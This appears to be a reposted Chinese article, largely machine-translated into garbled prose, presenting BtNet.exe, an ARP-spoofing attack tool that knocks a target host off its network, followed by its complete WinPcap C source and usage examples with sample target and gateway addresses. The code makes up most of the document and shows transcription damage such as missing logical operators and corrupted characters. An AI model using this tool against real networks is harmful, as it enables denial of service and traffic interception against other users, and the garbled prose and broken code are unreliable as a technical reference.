明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

的R -基于網(wǎng)絡(luò)攻擊, ARP協(xié)議欺騙程序源代碼BtNet.exe

發(fā)表時(shí)間:2023-07-11 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]信息來源:紅客聯(lián)盟 文章作者:粗魯 阿爾普的基礎(chǔ)上欺騙的網(wǎng)絡(luò)攻擊程序 寫的魯?shù)? 主頁: http://xEyes.cdut.net/ruder/ & & http://www.c...
信息來源:紅客聯(lián)盟

文章作者:粗魯

阿爾普的基礎(chǔ)上欺騙的網(wǎng)絡(luò)攻擊程序

寫的魯?shù)?

主頁: http://xEyes.cdut.net/ruder/ & & http://www.cnwill.com/ruder/

電子郵件: cocoruder@163.com

最近開始學(xué)習(xí)WinPcap的, 已經(jīng)看到了很多的基礎(chǔ)上撰寫的主人欺騙ARP協(xié)議捕獲工具, 特別是高級(jí)Dianzaiketai TOo2y的“談?wù)労粲鮓inPcap的驅(qū)動(dòng)程序的工具多ARP協(xié)議寫道: ”我感到非常的收益。 我下面的這個(gè)思想統(tǒng)一到ARP協(xié)議的攻擊程序(目標(biāo)主機(jī)可以斷開網(wǎng)絡(luò)連接)的一些測(cè)試。 請(qǐng)?zhí)^碩士, 以免有休閑的拉斯維加斯。

ARP協(xié)議欺騙一般是被欺騙的主機(jī)ARP協(xié)議答復(fù)報(bào)告的數(shù)據(jù)來源IP地址, 家里的合同, 東道國(guó)欺騙主機(jī)地址, 源MAC地址已改變了他們的MAC地址。 假設(shè)有兩個(gè)機(jī)器有A , B , 發(fā)送ARP協(xié)議答覆數(shù)據(jù)報(bào)告的A , 其中源IP地址為B的地址, 源MAC地址我的機(jī)器的MAC地址( IPRouter功能, 以確保數(shù)據(jù)傳送至公開) , 然后傳送公司的數(shù)據(jù)報(bào)告給我的頭發(fā)機(jī), 類似的B做同樣的手術(shù), 然后在A “ == ”乙數(shù)據(jù)將流經(jīng)的機(jī)器, 我期待到一個(gè)正常ARP協(xié)議包若要變更在甲, 乙, 直到ARP高速緩存。

然后, 我們發(fā)送到A的ARP協(xié)議報(bào)告的數(shù)據(jù)源IP , 源的MAC更改到任何這是會(huì)發(fā)生什么?這里列舉了一些我的測(cè)試

1 。 要改變?cè)碔P網(wǎng)關(guān)的IP , 源的MAC改變MAC地址不存在

在目標(biāo)主機(jī)幾乎不影響

2 。 要改變?cè)碔P網(wǎng)關(guān)的IP , 源的MAC改為隨機(jī)網(wǎng)絡(luò), 但沒有公開IPRouter主機(jī)的MAC地址

幾乎沒有任何影響

3 。 要改變?cè)碔P網(wǎng)關(guān)的IP , 源主機(jī)的MAC閱讀目標(biāo)的MAC

凈目標(biāo)主機(jī)立即!

當(dāng)我們發(fā)送可以看出通過ARP協(xié)議的結(jié)構(gòu)進(jìn)行真正的目標(biāo)主機(jī), 將主機(jī)的目標(biāo)改變ARP高速緩存, 數(shù)據(jù)包的MAC層將是一個(gè)時(shí)候, 網(wǎng)關(guān)IP和MAC地址自己的包在一起, 網(wǎng)關(guān)發(fā)送給報(bào)紙別無選擇, 只能發(fā)出自己的數(shù)據(jù), 哈哈。

至于第一種情況, 懷疑可能是因?yàn)镸AC地址不存在, 目標(biāo)將舉辦一個(gè)廣播ARP協(xié)議請(qǐng)求數(shù)據(jù)包和更新其ARP高速緩存造成的。

至于第2號(hào)案件中, 源MAC地址的嫌疑人將返回各自所在的地址解析答覆的目標(biāo)主機(jī)。

有限, 因此只有一個(gè)猜測(cè), 請(qǐng)讓我知道不久后, 先謝。

談?wù)摰氖牵?這些測(cè)試只適用于Windows系統(tǒng), 當(dāng)然, 還沒有經(jīng)過測(cè)試就分配好了成功的紅帽。

測(cè)試程序( BtNet.exe ) :

用法: BtNet小時(shí)attackIP鄰gateIP [米spoofedMAC ]

米的參數(shù), 你應(yīng)該修改源MAC地址。

為了掩蓋身份的攻擊, 該計(jì)劃已再次的目標(biāo)時(shí), 主機(jī)MAC地址偽裝成的IP : 128.128.128.128 , 陸委會(huì):第5條, 第5條, 第5條, 第5條, 第5條, 第5條, 無法獲取MAC地址的目標(biāo)主機(jī), 然后必須MAC地址的請(qǐng)求通過第三方的工具。

附測(cè)試代碼

#include "packet32.h"

#include "ntddndis.h"

#include <stdio.h>

#include <conio.h>

#include <winsock2.h>

#include <windows.h>

#pragma comment(lib,"ws2_32")

#pragma comment(lib,"packet")

#define ETH_IP 0x0800

#define ETH_ARP 0x0806

#define ARP_REQUEST 0x0001 //arp請(qǐng)求包

#define ARP_REPLY 0x0002 //arp應(yīng)答包

#define ARP_HARDWARE 0x0001

#define max_num_adapter 10

#pragma pack(push,1)

typedef struct ethdr

{

unsigned char eh_dst[6]; //以太網(wǎng)目的地址

unsigned char eh_src[6]; //以太網(wǎng)源地址

unsigned short eh_type; //

}ETHDR,*PETHDR;

typedef struct arphdr //arp頭

{

unsigned short arp_hdr; //硬件類型

unsigned short arp_pro; //協(xié)議類型

unsigned char arp_hln; //硬件地址長(zhǎng)度

unsigned char arp_pln; //協(xié)議地址長(zhǎng)度

unsigned short arp_opt; //

unsigned char arp_sha[6]; //發(fā)送端以太網(wǎng)地址

unsigned long arp_spa; //發(fā)送端ip地址

unsigned char arp_tha[6]; //接收端以太網(wǎng)地址

unsigned long arp_tpa; //接收端ip地址

}ARPHDR,*PARPHDR;

typedef struct ip_mac

{

u_long ip;

unsigned char mac[6];

}IP_MAC,*PIP_MAC;

#pragma pack(push)

LPADAPTER lpAdapter;

char adapterlist[max_num_adapter][1024];

IP_MAC toipandmac;

IP_MAC oipandmac,myipandmac;

BOOL param6=FALSE;

char *noMACstr;

char noMAC[6][3];

u_long mytoIP,oIP;

BOOL sendtoOip;

MSG msg;

UINT newtimer;

char MYIP[20]="128.128.128.128";

BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;

int getint(char c)

{

int t=-1;

if((c<='9')&&(c>='0'))

t=c-'0';

else if((c>='a')&&(c<='f'))

t=10+c-'a';

else if((c>='A')&&(c<='F'))

t=10+c-'A';

return t;

}

void start()

{

printf("BtNet //--an ARP Tool test the Windows Break the Internet\n");

printf("written by Ruder,10/2003\n");

printf("Homepage: http://xEyes.cdut.net/ruder/index.htm\;n");

printf("E-mail: cocoruder@163.com\n");

printf("\nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]\n");

printf("Example:\n");

printf("BtNet -h 202.115.138.12 -o 202.115.138.1\n");

printf("BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7c\n");

printf(" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");

return ;

}

DWORD WINAPI sniff(LPVOID)

{

LPPACKET lppackets,lpPacketr;

char recvbuf[1024*250];

ULONG ulbytesreceived,off;

ETHDR *eth;

ARPHDR *arp;

char *buf,*pChar,*base;

char szTemp[20];

struct bpf_hdr *hdr;

if((lppackets=PacketAllocatePacket())==FALSE)

{

printf("PacketAllocatePacket send Error: %d\n",GetLastError());

return 0;

}

if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)

{

printf("Warning: Unable to set the adapter to promiscuous mode\n");

}

if(PacketSetBuff(lpAdapter,500*1024)==FALSE)

{

printf("PacketSetBuff Error: %d\n",GetLastError());

return 0;

}

if(PacketSetReadTimeout(lpAdapter,1)==FALSE)

{

printf("Warning: Unable to set the timeout\n");

}

if((lpPacketr=PacketAllocatePacket())==FALSE)

{

printf("PacketAllocatePacket receive Error: %d\n",GetLastError());

return 0;

}

PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));

while(!kbhit())

{

if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)

{

return 0;

}

//getdata(lppacketr,option);

ulbytesreceived=lpPacketr->ulBytesReceived;

buf=(char *)lpPacketr->Buffer;

off=0;

while(off<ulbytesreceived)

{

if(kbhit())

{

return 0;

}

hdr=(struct bpf_hdr *)(buf+off);

off+=hdr->bh_hdrlen;

pChar=(char *)(buf+off);

base=pChar;

off=Packet_WORDALIGN(off+hdr->bh_caplen);

eth=(PETHDR)pChar; //以太頭

arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arp頭

int i;

if((eth->eh_type==htons(ETH_ARP))&&

(arp->arp_opt==htons(ARP_REPLY)))

{

//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))

{

if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)

return 0;

if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))

((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))

((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))

{

memset(szTemp,0,sizeof(szTemp));

memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));

printf("[IP]:");

printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));

printf("[MAC]:");

for(i=0;i<5;i++)

{

printf("%.2x-",eth->eh_src[i]);

}

printf("%.2x",eth->eh_src[5]);

printf("\n");

if (toipandmac.ip==htonl(arp->arp_spa))

{

for(i=0;i<6;i++)

toipandmac.mac[i]=eth->eh_src[i];

toipandmac_flag=TRUE;

}

if (oipandmac.ip==htonl(arp->arp_spa))

{

for(i=0;i<6;i++)

oipandmac.mac[i]=eth->eh_src[i];

oipandmac_flag=TRUE;

// printf("if you have get the MAC Addresses enough,Press any key for staring!\n");

}

if(myipandmac.ip==htonl(arp->arp_spa))

{

for(i=0;i<6;i++)

myipandmac.mac[i]=eth->eh_src[i];

myipandmac_flag=TRUE;

}

}

}

}

continue;

}

}

return 0;

}

DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)

{

LPPACKET lpPacket;

ETHDR eth;

ARPHDR arphdr;

int i;

char szPacketBuf[600];

u_long sendtoIP=*(u_long *)dwsendtoIP;

//struct sockaddr_in sin;

lpPacket = PacketAllocatePacket();

if(lpPacket==NULL)

{

printf("\nPacketAllocatePacket error!");

return 0;

}

eth.eh_type=htons(ETH_ARP);

for(i=0;i<6;i++)

{

eth.eh_dst[i]=0xff;

eth.eh_src[i]=0xa5;

arphdr.arp_sha[i]=0xa5;

arphdr.arp_tha[i]=0xff;

}

arphdr.arp_hdr=htons(ARP_HARDWARE);

arphdr.arp_pro=htons(ETH_IP);

arphdr.arp_opt=htons(ARP_REQUEST);

arphdr.arp_hln=6;

arphdr.arp_pln=4;

arphdr.arp_tpa=htonl(sendtoIP);

arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP)));

if(sendtoOip)

{

if(myipandmac_flag)

{

for(i=0;i<6;i++)

{

eth.eh_src[i]=myipandmac.mac[i];

arphdr.arp_sha[i]=myipandmac.mac[i];

arphdr.arp_spa=htonl(myipandmac.ip);

//memset(MYIP,0,sizeof(MYIP));

}

}

else

{

printf("My MAC Address Can't Find!\n");

return 0;

}

}

memset(szPacketBuf,0,sizeof(szPacketBuf));

memcpy(szPacketBuf,ð,sizeof(ETHDR));

memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

PacketInitPacket(lpPacket,szPacketBuf,60);

if(PacketSetNumWrites(lpAdapter, 1)==FALSE)

{

printf("warning: Unable to send more than one packet in a single write!\n");

}

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)

{

printf("Error sending the packets!\n");

PacketFreePacket(lpPacket);

return 0;

}

PacketFreePacket(lpPacket);

return 0;

}

DWORD WINAPI sendSR()

{

ETHDR eth;

ARPHDR arphdr;

int i;

char szPacketBuf[600];

LPPACKET lpPacket;

unsigned char toMAC[6];

struct sockaddr_in sin;

u_long toIP=mytoIP;

//if ((myipandmac_flag==FALSE) (oipandmac_flag==FALSE) (toipandmac_flag==FALSE))

//{

// printf("Can't get all MAC address!\n");

// return 0;

//}

lpPacket = PacketAllocatePacket();

if(lpPacket == NULL)

{

printf("\nError:failed to allocate the LPPACKET structure.\n");

return 0;

}

if (toipandmac_flag==FALSE)

{

printf("Can't get toMAC address!\n");

return 0;

}

memset(toMAC,0,sizeof(toMAC));

memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));

if (param6)

{

for(i=0;i<6;i++)

{

int t1,t2;

char c1,c2;

c1=noMAC[i][0];

c2=noMAC[i][1];

t1=getint(c1);

t2=getint(c2);

if((t1==-1) (t2==-1))

{

printf("-m parameter error!\n");

return 0;

}

eth.eh_src[i]=t1*16+t2;

eth.eh_dst[i]=toMAC[i];

arphdr.arp_sha[i]=t1*16+t2;

arphdr.arp_tha[i]=toMAC[i];

}

}

else

{

for(i=0;i<6;i++)

{

eth.eh_src[i]=toMAC[i];

eth.eh_dst[i]=toMAC[i];

arphdr.arp_sha[i]=toMAC[i];

arphdr.arp_tha[i]=toMAC[i];

}

}

eth.eh_type=htons(ETH_ARP);

arphdr.arp_spa=htonl(oIP);

arphdr.arp_tpa=htonl(toIP);

arphdr.arp_hdr=htons(ARP_HARDWARE);

arphdr.arp_pro=htons(ETH_IP);

arphdr.arp_opt=htons(ARP_REPLY);

arphdr.arp_hln=6;

arphdr.arp_pln=4;

memset(szPacketBuf,0,sizeof(szPacketBuf));

memcpy(szPacketBuf,ð,sizeof(ETHDR));

memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

PacketInitPacket(lpPacket,szPacketBuf,60);

if(PacketSetNumWrites(lpAdapter, 1)==FALSE)

{

printf("warning: Unable to send more than one packet in a single write!\n");

}

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)

{

printf("Error sending the packets!\n");

PacketFreePacket(lpPacket);

return 0;

}

PacketFreePacket(lpPacket);

sin.sin_addr.s_addr=arphdr.arp_tpa;

printf("spoof %s: ",inet_ntoa(sin.sin_addr));

sin.sin_addr.s_addr=arphdr.arp_spa;

printf("%s-->",inet_ntoa(sin.sin_addr));

for(i=0;i<5;i++)

printf("%.2x-",arphdr.arp_sha[i]);

printf("%x",arphdr.arp_sha[5]);

printf("\n");

return 0;

}

DWORD WINAPI sendSRTimer(LPVOID dwtoIP)

{

printf("Waiting spoof Start\n");

mytoIP=*(u_long *)dwtoIP;

newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR));

while(GetMessage(&msg,0,0,0))

{

TranslateMessage(&msg);

DispatchMessage(&msg);

}

return 0;

}

int main(int argc,char *argv[])

{

HANDLE thread1,thread2,thread3;

WCHAR adaptername[8192];

WCHAR *name1,*name2;

ULONG adapterlength;

DWORD threadid1,threadid2,threadid3;

u_long toIP,myip;

struct NetType ntype;

struct sockaddr_in sin;

struct npf_if_addr ipbuff;

int adapternum=0,opti=0,open,i,j;

long npflen;

if((argc!=5)&&(argc!=7))

{

start();

return 0;

}

else if((strcmp(argv[1],"-h")!=0) (strcmp(argv[3],"-o")!=0))

{

start();

return 0;

}

toIP=ntohl(inet_addr(argv[2]));

oIP=ntohl(inet_addr(argv[4]));

if (argv[5]!=NULL)

{

if (strcmp(argv[5],"-m")==0)

{

noMACstr=argv[6];

j=0;

for(i=0;i<6;i++)

{

memset(noMAC[i],0,sizeof(noMAC[i]));

memcpy(noMAC[i],noMACstr,2);

noMACstr=noMACstr+3;

}

param6=TRUE;

}

}

printf("\nLibarary Version: %s",PacketGetVersion());

adapterlength=sizeof(adaptername);

if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) //得到網(wǎng)卡列表

{

printf("PacketGetAdapterNames Error: %d\n",GetLastError());

return -1;

}

name1=adaptername;

name2=adaptername;

i=0;

while((*name1!='\0') (*(name1-1)!='\0'))

{

if(*name1=='\0')

{

memcpy(adapterlist[i],name2,2*(name1-name2));

name2=name1+1;

i++;

}

name1++;

}

adapternum=i;

printf("\nAdapters Installed:\n");

for(i=0;i<adapternum;i++)

wprintf(L"%d - %s\n",i+1,adapterlist[i]);

do

{

printf("\nSelect the number of the adapter to open: ");

scanf("%d",&open);

if(open>=1 && open<=adapternum)

break;

}while(open<1 open>adapternum);

lpAdapter=PacketOpenAdapter(adapterlist[open-1]);

if(!lpAdapter (lpAdapter->hFile==INVALID_HANDLE_value))

{

printf("PacketOpenAdapter Error: %d\n",GetLastError());

return -1;

}

if(PacketGetNetType(lpAdapter,&ntype))

{

printf("\n\t\t*** Host Information ***\n");

printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);

printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);

}

npflen=sizeof(ipbuff);

if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))

{

sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);

printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));

sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);

printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));

sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);

printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));

myip=ntohl(sin.sin_addr.s_addr);

printf("[MACAddress:]");

}

else

{

printf("\nNot get enough data\n");

//PacketFreePacket(lppackets);

PacketCloseAdapter(lpAdapter);

return -1;

}

printf("\n");

oipandmac.ip=oIP;

toipandmac.ip=toIP;

myipandmac.ip=myip;

sendtoOip=FALSE;

thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);

Sleep(300);

thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);

Sleep(100);

CloseHandle(thread2);

thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);

Sleep(10);

CloseHandle(thread2);

sendtoOip=TRUE;

Sleep(200);

thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);

Sleep(10);

CloseHandle(thread2);

// WaitForSingleObject(thread1,INFINITE);

thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);

WaitForSingleObject(thread3,INFINITE);

PacketCloseAdapter(lpAdapter);

return 0;

}


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。